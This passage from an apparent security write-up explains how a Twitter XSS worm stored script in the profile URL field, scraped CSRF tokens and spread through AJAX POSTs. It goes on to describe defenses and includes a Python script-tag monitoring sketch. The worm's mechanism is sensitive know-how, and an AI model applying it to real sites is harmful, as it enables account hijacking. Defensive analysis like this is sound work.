The CSRF code is using AJAX calls to stealthily send requests to Twitter without the user's knowledge. It issues a POST to the "/status/update" page to post the misleading tweet, and a second POST to the "/account/settings" page with the appropriate parameter data to modify the "user[url]" data. Also important to note - Twitter was using a CSRF token (called authenticity_token) to help prevent these types of attacks. This is the perfect example of why, if your web application has XSS vulnerabilities, the use of a CSRF token is useless for local attacks. As you can see in the payload above, the XSS AJAX code is simply scraping the authenticity_token data from within the browser and sending it with the attack payload.

The Cortesi blog has an excellent technical write-up of what is happening -

What’s happening here is that it looks like somebody realized they could save url encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing somebody’s profile page on Twitter that was already infected. If you visited an infected profile, the JavaScript in the profile would execute and by doing so tweet the mis-leading link, and update your profile with the same malicious JavaScript thereby infecting anybody that then visits your profile on twitter.com.

Defenses/Mitigations - Users
Use the NoScript plugin for Firefox as it will allow you to pick and choose when/where/what javascript you want to allow to run.

Defenses/Mitigations - Web Apps
Disallowing clients from submitting any html code is manageable, however you still need to be able to canonicalize the data before applying any of your filters. If done properly, you can simply look for html/scripting tags and data and disallow it entirely. What is challenging is when you have to allow your clients to submit html code, but you want to disallow malicious code. Wiki sites, blogs and social media sites such as Twitter have to allow their clients some ability to upload html data. For situations such as this, applications such as the OWASP AntiSamy package or HTMLPurifier are excellent choices.

Although allowing some level of basic html code changing is understandable, adding in scripting code is different. One aspect of monitoring that can be done (by a web application firewall) is to monitor and track the use of scripting code per resource. By tracking this type of meta-data, you could identify if *any* scripting code is suddenly appearing on a page (when previously there was none) or if there are, say 2 "<script>" tags on a page and now there are 3. This would indicate some sort of an application change. Once alerted to this, the next question is - Was this a legitimate change or something malicious? If Twitter had been using this type of monitoring, they would have been alerted as soon as "Victim Zero" (in this case - the worm originator) altered his profile URL with the encoded Javascript data.
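The per-resource script tracking idea can be sketched with Python's standard HTML parser. The baseline dictionary stands in for the meta-data a WAF would have learned about each resource; it, the function names and the example paths are assumptions for illustration only.

```python
from html.parser import HTMLParser


class ScriptCounter(HTMLParser):
    """Count opening <script> tags in a response body."""

    def __init__(self):
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.count += 1


def count_script_tags(body: str) -> int:
    """Parse the body and return the number of <script> tags found."""
    parser = ScriptCounter()
    parser.feed(body)
    parser.close()
    return parser.count


def script_count_changed(resource: str, body: str, baseline: dict) -> bool:
    """Return True when the number of script tags differs from the learned
    baseline for this resource (unknown resources default to zero)."""
    return count_script_tags(body) != baseline.get(resource, 0)
```

A change in the count only says that the page changed, so an alert raised this way still needs the follow-up question from the paragraph above: was the change legitimate or malicious?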